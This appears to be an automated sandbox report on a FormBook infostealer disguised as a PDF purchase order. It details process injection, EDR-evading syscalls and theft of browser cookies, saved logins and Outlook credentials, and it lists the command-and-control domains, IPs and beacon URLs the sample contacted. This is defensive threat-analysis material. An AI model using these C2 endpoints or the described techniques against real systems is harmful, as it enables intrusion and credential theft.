            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 5768Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31FC008Jump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00014A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00014A35
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"Jump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00074A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00074A08
            Source: PO-78140924.BAT.PDF.exe, 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: YKkstfciYBQ.exe, 00000003.00000002.3897163672.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000000.2070424166.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: PO-78140924.BAT.PDF.exe, YKkstfciYBQ.exe, 00000003.00000002.3897163672.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000000.2070424166.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: YKkstfciYBQ.exe, 00000003.00000002.3897163672.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000000.2070424166.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: YKkstfciYBQ.exe, 00000003.00000002.3897163672.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000000.2070424166.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000387AB cpuid 0_2_000387AB
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00045007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00045007
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000440BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_000440BA
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00014AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00014AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		312
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		312
            Process Injection            		21
            Input Capture            		151
            Security Software Discovery            		Remote Desktop Protocol21
            Input Capture            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Archive Collected Data            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS3
            Process Discovery            		Distributed Component Object Model1
            Data from Local System            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
            Obfuscated Files or Information            		LSA Secrets11
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSync115
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519457 Sample: PO-78140924.BAT.PDF.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 31 www.heldhold.xyz 2->31 33 www.useanecdotenow.tech 2->33 35 16 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 47 7 other signatures 2->47 10 PO-78140924.BAT.PDF.exe 3 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 31->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 63 Switches to a custom stack to bypass stack traces 10->63 13 svchost.exe 10->13         started        process6 signatures7 65 Maps a DLL or memory area into another process 13->65 16 YKkstfciYBQ.exe 13->16 injected process8 dnsIp9 25 www.heldhold.xyz 67.223.117.189, 49724, 49725, 49726 VIMRO-AS15189US United States 16->25 27 www.mfgarage.net 85.153.138.113, 49740, 49741, 49742 TELECABLESpainES Turkey 16->27 29 6 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 mstsc.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO-78140924.BAT.PDF.exe79%ReversingLabsWin32.Trojan.Strab
            PO-78140924.BAT.PDF.exe100%AviraHEUR/AGEN.1353271
            PO-78140924.BAT.PDF.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.heldhold.xyz/fava/?lHul=nfQTqL40vDEpIp30&vf5pwn=GCDZpLqdSYk7fT5BaAxVCvWfN8QL3LUdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQAngPiIKVJBW1l0NVsB5cz1lTXdEnKbnDfocvymGyGvQBrQ==0%Avira URL Cloudsafe
            http://www.mfgarage.net/3lu7/?vf5pwn=nzWofdhWpyQTuQkAURoZiOuSpDDcsuZ4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCJcPncARSRGAtt0+HcJ3GcQEnXiNUfFJGdHJ4JUWSbdHV9w==&lHul=nfQTqL40vDEpIp300%Avira URL Cloudsafe
            http://www.ultraleap.net/8pln/?vf5pwn=T9/DtY4QstE2hf5N+QbDCp08BY0+/KIvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9qM2494p5Ur94ranWdRPLWWfdK4ZvNUpqMUToNubzG0SM8g==&lHul=nfQTqL40vDEpIp300%Avira URL Cloudsafe
            https://whois.gandi.net/en/results?search=ultraleap.net0%Avira URL Cloudsafe
            http://www.linkwave.cloud/al6z/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.2bhp.com/a4ar/?vf5pwn=bigEPZ6XMKFUrjbkOOF/tc1QSeZpy4rj9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOCaAaQ3Lxux4SSFbsDgkYjgjAaiC5myZdzdYIguvdh1gvDg==&lHul=nfQTqL40vDEpIp300%Avira URL Cloudsafe
            http://www.dalong.site/v2c3/0%Avira URL Cloudsafe
            http://www.b5x7vk.agency/zznj/0%Avira URL Cloudsafe
            https://www.gandi.net/en/domain0%Avira URL Cloudsafe
            http://www.dalong.site/v2c3/?lHul=nfQTqL40vDEpIp30&vf5pwn=4KW7rJi8xQgG5JuhUUy4oHXtvgFnSuEzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxet5jRO5AJzixTprPi8JCHFDrvphN2mQYrYWI0Ljg/1k5GCA==0%Avira URL Cloudsafe
            http://www.asiapartnars.online/kt2f/0%Avira URL Cloudsafe
            http://www.asiapartnars.online/kt2f/?vf5pwn=3qIRfQl/AKdo1myXluGCiikgEIMzjkfYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfHO+i2Ne6X81cG7kNzDpu31X3NSjbrBV+9ESn2I73xzu4qQ==&lHul=nfQTqL40vDEpIp300%Avira URL Cloudsafe
            http://www.mfgarage.net/3lu7/0%Avira URL Cloudsafe
            http://www.ultraleap.net/8pln/0%Avira URL Cloudsafe
            http://www.b5x7vk.agency0%Avira URL Cloudsafe
            https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3Fvf5pwn%3Dnz0%Avira URL Cloudsafe
            http://www.heldhold.xyz/fava/0%Avira URL Cloudsafe
            http://www.63582.photo/5o7d/0%Avira URL Cloudsafe
            http://www.63582.photo/5o7d/?vf5pwn=zMeRclQqEZ6cHEkv6r3h6rNdPeIv0NfXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGdsHlq0LOSSwDS14egmHnY5/1aPOe4+/4uS5IVfZSCCmkbAw==&lHul=nfQTqL40vDEpIp300%Avira URL Cloudsafe
            http://www.mgeducacaopro.online/xamn/0%Avira URL Cloudsafe
            http://www.linkwave.cloud/al6z/?lHul=nfQTqL40vDEpIp30&vf5pwn=VRCNh0NW0GgzXjJ+E9kBcAqzCeGDRYuLK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cpu7tsWuW3JQaVwptT6evyL2oGhO/bgF+68v7eWhteCSlc6A==0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            webredir.vip.gandi.net
            		217.70.184.50
            		truetrue
              		unknown
              azkwupgf.as66588.com
              		103.248.137.209
              		truetrue
                		unknown
                dalong.site
                		172.96.187.60
                		truetrue
                  		unknown
                  www.b5x7vk.agency
                  		172.67.165.25
                  		truetrue
                    		unknown
                    www.heldhold.xyz
                    		67.223.117.189
                    		truetrue
                      		unknown
                      www.2bhp.com
                      		81.88.63.46
                      		truetrue
                        		unknown
                        linkwave.cloud
                        		3.33.130.190
                        		truetrue
                          		unknown
                          asiapartnars.online
                          		3.33.130.190
                          		truetrue
                            		unknown
                            mgeducacaopro.online
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.mfgarage.net
                              		85.153.138.113
                              		truetrue
                                		unknown
                                www.dalong.site
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.useanecdotenow.tech
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.ultraleap.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.linkwave.cloud
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.mgeducacaopro.online
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.63582.photo
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.asiapartnars.online
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.linkwave.cloud/al6z/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ultraleap.net/8pln/?vf5pwn=T9/DtY4QstE2hf5N+QbDCp08BY0+/KIvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9qM2494p5Ur94ranWdRPLWWfdK4ZvNUpqMUToNubzG0SM8g==&lHul=nfQTqL40vDEpIp30true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mfgarage.net/3lu7/?vf5pwn=nzWofdhWpyQTuQkAURoZiOuSpDDcsuZ4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCJcPncARSRGAtt0+HcJ3GcQEnXiNUfFJGdHJ4JUWSbdHV9w==&lHul=nfQTqL40vDEpIp30true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.heldhold.xyz/fava/?lHul=nfQTqL40vDEpIp30&vf5pwn=GCDZpLqdSYk7fT5BaAxVCvWfN8QL3LUdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQAngPiIKVJBW1l0NVsB5cz1lTXdEnKbnDfocvymGyGvQBrQ==true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.b5x7vk.agency/zznj/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dalong.site/v2c3/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.2bhp.com/a4ar/?vf5pwn=bigEPZ6XMKFUrjbkOOF/tc1QSeZpy4rj9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOCaAaQ3Lxux4SSFbsDgkYjgjAaiC5myZdzdYIguvdh1gvDg==&lHul=nfQTqL40vDEpIp30true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dalong.site/v2c3/?lHul=nfQTqL40vDEpIp30&vf5pwn=4KW7rJi8xQgG5JuhUUy4oHXtvgFnSuEzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxet5jRO5AJzixTprPi8JCHFDrvphN2mQYrYWI0Ljg/1k5GCA==true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.asiapartnars.online/kt2f/?vf5pwn=3qIRfQl/AKdo1myXluGCiikgEIMzjkfYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfHO+i2Ne6X81cG7kNzDpu31X3NSjbrBV+9ESn2I73xzu4qQ==&lHul=nfQTqL40vDEpIp30true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.asiapartnars.online/kt2f/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mfgarage.net/3lu7/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.63582.photo/5o7d/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.63582.photo/5o7d/?vf5pwn=zMeRclQqEZ6cHEkv6r3h6rNdPeIv0NfXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGdsHlq0LOSSwDS14egmHnY5/1aPOe4+/4uS5IVfZSCCmkbAw==&lHul=nfQTqL40vDEpIp30true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ultraleap.net/8pln/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.heldhold.xyz/fava/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mgeducacaopro.online/xamn/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.linkwave.cloud/al6z/?lHul=nfQTqL40vDEpIp30&vf5pwn=VRCNh0NW0GgzXjJ+E9kBcAqzCeGDRYuLK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cpu7tsWuW3JQaVwptT6evyL2oGhO/bgF+68v7eWhteCSlc6A==true
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabmstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://duckduckgo.com/ac/?q=mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://whois.gandi.net/en/results?search=ultraleap.netYKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000004456000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005096000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3899373295.0000000007390000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icomstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
